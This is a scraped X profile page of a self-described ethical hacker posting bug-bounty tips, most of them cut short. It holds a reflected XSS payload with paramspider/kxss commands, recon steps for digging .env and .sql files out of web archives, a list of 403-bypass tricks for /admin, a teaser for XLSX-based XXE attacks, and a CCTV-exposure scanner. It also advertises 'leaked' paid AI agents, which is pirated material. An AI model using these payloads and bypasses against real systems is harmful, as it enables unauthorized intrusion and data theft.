X (@themsterdoctor1) 's Twitter Profile
X

@themsterdoctor1

I Characterize Myself as a Retired Hacker. I'm Applying What I Know To Improve Security at Companies Ethical Hacker | AppSec Engineer Team Lead | OSCP

ID: 1256413047389904896

linkhttps://www.buymeacoffee.com/chupachikoq/posts calendar_today02-05-2020 02:40:02

2,2K Tweet

25,25K Followers

615 Following

X (@themsterdoctor1) 's Twitter Profile Photo

Quick tip to find reflected xss: 1- python3 paramspider.py --domain domian.com 2- cat domain.com.txt | kxss | grep "< >" | tee unfiltered_param.txt 3- inject simple xss payload: "><img src=x onerror=alert("XSS")> β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”- Payloads

Quick tip to find reflected xss:

1- python3 paramspider.py --domain domian.com

2- cat domain.com.txt | kxss | grep "&lt; &gt;" | tee unfiltered_param.txt 

3- inject simple xss payload:

"&gt;&lt;img src=x onerror=alert("XSS")&gt;
β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”-
Payloads
X (@themsterdoctor1) 's Twitter Profile Photo

πŸ”₯ Advanced Recon Methodology β€” by TheM@sterDoctor1 --- ## πŸ›° Reconnaissance Phase: Gathering URLs Historical Files Enumeration # Extract .zip, .rar, .sql, .env, etc. from Wayback Machine & GAU cat domains.txt | waybackurls | grep -Ei

πŸ”₯ Advanced Recon Methodology β€” by TheM@sterDoctor1

---

## πŸ›° Reconnaissance Phase: Gathering URLs

Historical Files Enumeration

# Extract .zip, .rar, .sql, .env, etc. from Wayback Machine &amp; GAU

cat domains.txt | waybackurls | grep -Ei
X (@themsterdoctor1) 's Twitter Profile Photo

🧠πŸ’₯ 99% of hackers QUIT when they see a 403… But the 1%? They try this: πŸ‘‡ I found a 403 Forbidden on /admin. But then I tried: β€’POST /admin β€’X-Original-URL: /admin β€’/admin..;/ β€’%2e/admin β€’X-Rewrite-URL: /admin β€’/ADMIN (yes, just caps) β€’/;/admin β€’/..;/admin πŸ‘‡πŸ‘‡πŸ‘‡

🧠πŸ’₯ 99% of hackers QUIT when they see a 403…

But the 1%? They try this: πŸ‘‡

I found a 403 Forbidden on /admin.

But then I tried:
β€’POST /admin
β€’X-Original-URL: /admin
β€’/admin..;/
β€’%2e/admin
β€’X-Rewrite-URL: /admin
β€’/ADMIN (yes, just caps)
β€’/;/admin
β€’/..;/admin

πŸ‘‡πŸ‘‡πŸ‘‡
X (@themsterdoctor1) 's Twitter Profile Photo

🚨 EXPOSED: $5,000+ AI AGENTS LEAKED (Free Access) 🚨 200+ plug-and-play AI agents β€” built for social media, sales, scraping, support, content, devops & more β€” just went public. 🧠 Agents include: βœ… Social Media Agents ($8K builds) βœ… Lead Booking / Cold Outreach ($6K) βœ… Data

X (@themsterdoctor1) 's Twitter Profile Photo

πŸ’£ Elite-Level XLSX β†’ XXE Payload Delivery Chain for Web App Compromise & Bounty Farming βΈ» 🧠 TL;DR: Turn Excel Into an RCE Vector via Blind XXE Exploit the widespread assumption that .xlsx files are harmless. Embed XXE payloads inside Office XML files, get blind

πŸ’£ Elite-Level XLSX β†’ XXE Payload Delivery Chain for Web App Compromise &amp; Bounty Farming

βΈ»

🧠 TL;DR: Turn Excel Into an RCE Vector via Blind XXE

Exploit the widespread assumption that .xlsx files are harmless. Embed XXE payloads inside Office XML files, get blind
X (@themsterdoctor1) 's Twitter Profile Photo

Here’s an ultra-advanced Google Dorks cheat-sheet for bug bounty hunters. Replace example{}.com with your target domain (or use ${DOMAIN} in scripts), and feel free to mix & match the clauses for more surgical searches. 🌐 Domain-Scoped Templates # Basic domain scope

Here’s an ultra-advanced Google Dorks cheat-sheet for bug bounty hunters. Replace example{}.com with your target domain (or use ${DOMAIN} in scripts), and feel free to mix &amp; match the clauses for more surgical searches.

🌐 Domain-Scoped Templates

# Basic domain scope
X (@themsterdoctor1) 's Twitter Profile Photo

πŸ¦… 20 RECON COMMANDS FROM THE FUTURE 1. πŸš€ GPT-Aided Wildcard Scope Expansion + Org Correlation echo "uber.com" | httpx -silent | gptcli -p "Find all owned subsidiaries, forgotten domains, infrastructure, GitHub orgs, SaaS integrations, and analytics IDs tied to

X (@themsterdoctor1) 's Twitter Profile Photo

🚨 STOP WASTING TIME on clunky recon workflows! Just found Web Check – an insanely powerful all-in-one OSINT tool that breaks down everything about a website in seconds. πŸ•΅οΈβ€β™‚οΈπŸ’» πŸ”— web-check.xyz πŸ” GitHub: github.com/lissy93/web-ch… ✨ Features: β€’WHOIS, DNS, WAF, TLS,

🚨 STOP WASTING TIME on clunky recon workflows!

Just found Web Check – an insanely powerful all-in-one OSINT tool that breaks down everything about a website in seconds. πŸ•΅οΈβ€β™‚οΈπŸ’»
πŸ”— web-check.xyz
πŸ” GitHub: github.com/lissy93/web-ch…

✨ Features:
β€’WHOIS, DNS, WAF, TLS,
X (@themsterdoctor1) 's Twitter Profile Photo

Anyone Can Access Your CCTV CAMERAS β˜ οΈπŸ“· CamXploit v2.0.1 Find, analyze, and check for exposed IP cameras with open ports, known vulnerabilities, and weak login credentials. Run Online: lnkd.in/eSDdGk93 GitHub: lnkd.in/erqEsRBD What's New in v2.0.1 Massive port

Anyone Can Access Your CCTV CAMERAS β˜ οΈπŸ“·

CamXploit v2.0.1
Find, analyze, and check for exposed IP cameras with open ports, known vulnerabilities, and weak login credentials.

Run Online: lnkd.in/eSDdGk93

GitHub: lnkd.in/erqEsRBD

What's New in v2.0.1

Massive port